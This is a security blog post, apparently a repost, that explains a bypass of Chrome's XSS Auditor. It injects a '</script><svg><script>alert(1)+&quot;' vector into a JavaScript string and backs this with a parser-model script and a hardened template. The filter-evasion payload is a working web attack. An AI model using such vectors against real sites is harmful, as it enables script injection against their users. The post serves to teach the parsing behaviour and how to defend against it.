XSS Auditor bypass


XSS Auditor is getting pretty good, at least in the tests I was doing, but after a bit more testing I found a neat bypass. Without studying the code, it appears to check whether the suspected vector contains valid JavaScript, and I thought I could use that to my advantage. The idea is to smuggle the vector inside an existing script block on the page and reuse the page's own closing script tag. The page contains a script block like this, where the reflected value lands inside a JavaScript string literal:


<script>x = "MY INJECTION"</script>

As every XSS hacker knows, a "</script>" ends the script element wherever it appears, even inside a JavaScript string, because the HTML tokenizer knows nothing about JavaScript quoting; that lets you escape the script block and inject an HTML XSS vector. So I broke out of the script block and used the page's trailing quote to complete my vector, like so:


</script><script>alert(1)+"

You could of course use a standard ",alert(1)," but what if quotes are filtered? I then came up with the idea of using SVG and an HTML-escaped quote. The SVG wrapper is what makes this work: inside an HTML <script> element the content is raw text, so &quot; would stay literal and the script would not parse, but inside <svg> the parser is in foreign content, where character references in script text are decoded, so &quot; becomes a real quote before the script runs and the JavaScript is valid. This gets past the quote filter, and because it is a plain reflected HTML vector with no DOM component it sits squarely within the Auditor's scope; reflection into a JavaScript string is also very common in my experience. Here is the final vector, shown in place in the page's script block (the closing quote, semicolon and </script> are the page's own):


<script>x = "</script><svg><script>alert(1)+&quot;";</script>
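To see exactly why the page ends up with a second, valid script, here is an added example in plain JavaScript; it is not code from the original post. It models the two parser rules the bypass relies on (a script element ends at the first "</script" regardless of JavaScript quoting, and character references are decoded only in SVG script text), feeds the vector through a hypothetical quote-stripping filter into a hypothetical template that reflects into x = "…", and checks each resulting script with new Function. The hardened template at the end (JSON.stringify plus escaping "<") is an added fix, not something the post describes, and all function names are assumptions.

```javascript
// Added example, not the original post's code. Models the parser behaviour the
// bypass relies on and contrasts a vulnerable template with a hardened one.
// Names (renderUnsafe, renderSafe, naiveQuoteFilter, analyse) are hypothetical.

// The final vector from the post. Note: no raw quote characters anywhere.
const INJECTION = '</script><svg><script>alert(1)+&quot;';

// Hypothetical filter that strips quotes (the "what if quotes are filtered?" case).
function naiveQuoteFilter(value) {
  return value.replace(/["']/g, '');
}

// Hypothetical vulnerable template: the reflected value is dropped straight into
// a JS string literal. This is the x = "MY INJECTION" pattern from the post.
function renderUnsafe(value) {
  return '<html><body><script>x = "' + value + '";</script></body></html>';
}

// Hardened template (added here, not from the post): emit a proper JS literal and
// escape "<" so the literal can never contain "</script" or "<!--", the two
// sequences the HTML tokenizer acts on inside script data.
function renderSafe(value) {
  const literal = JSON.stringify(value).replace(/</g, '\\u003c');
  return '<html><body><script>x = ' + literal + ';</script></body></html>';
}

// Minimal character-reference decoder. A real HTML parser applies this to SVG
// (foreign content) script text only; HTML <script> content is raw text.
function decodeCharRefs(text) {
  const named = { quot: '"', apos: "'", amp: '&', lt: '<', gt: '>' };
  return text.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (whole, ref) => {
    if (ref[0] === '#') {
      const hex = ref[1] === 'x' || ref[1] === 'X';
      return String.fromCodePoint(parseInt(ref.slice(hex ? 2 : 1), hex ? 16 : 10));
    }
    const v = named[ref.toLowerCase()];
    return v === undefined ? whole : v;
  });
}

// Does the text parse as a JavaScript program? new Function compiles without running it.
function parsesAsJs(src) {
  try { new Function(src); return true; } catch (e) { return false; }
}

// Cut-down tokenizer rule: a <script> element ends at the first "</script" the
// tokenizer sees, whatever the JavaScript quoting state. For each script element
// found, report whether it sits inside <svg>, the JS text the engine would actually
// receive, and whether that text is valid JavaScript.
function analyse(html) {
  const scripts = [];
  const re = /<script(?:\s[^>]*)?>([\s\S]*?)<\/script\s*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const before = html.slice(0, m.index);
    const inSvg = before.lastIndexOf('<svg') > before.lastIndexOf('</svg');
    const effectiveJs = inSvg ? decodeCharRefs(m[1]) : m[1];
    scripts.push({ raw: m[1], inSvg, effectiveJs, valid: parsesAsJs(effectiveJs) });
  }
  return scripts;
}

// Run a script's text and return what x ends up holding, to show that the hardened
// page preserves the value byte for byte instead of executing it.
function valueOfX(js) {
  return new Function('var x; ' + js + '\nreturn x;')();
}

// Demo: the vulnerable page yields two script elements, and the second (inside
// <svg>) becomes alert(1)+""; which is valid JS. The hardened page yields one
// script element whose value round-trips unchanged.
for (const [label, html] of [['unsafe', renderUnsafe(naiveQuoteFilter(INJECTION))],
                             ['safe', renderSafe(INJECTION)]]) {
  console.log(label, JSON.stringify(analyse(html), null, 2));
}
```

The first script element on the vulnerable page is left holding x = " and fails to parse, which is exactly the kind of fragment a JavaScript-validity heuristic would dismiss; the payload lives entirely in the second element. Swapping the <svg> wrapper out (or leaving the &quot; undecoded) makes the second script a syntax error too, which is why the foreign-content rule is the load-bearing part of the vector.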

XSS auditor PoC

Chrome's XSS Auditor has since been removed entirely (Chrome 78, 2019), so the bypass itself is of historical interest. The parsing behaviour it relies on, a </script> ending the element regardless of JavaScript quoting and character references being decoded inside SVG script content, is unchanged and still matters for any reflected-XSS filter or sanitiser that reasons about the JavaScript rather than about how the HTML parser will split the page.


Source: https://www.truth.cx/2015/02/10/xss-auditor-bypass/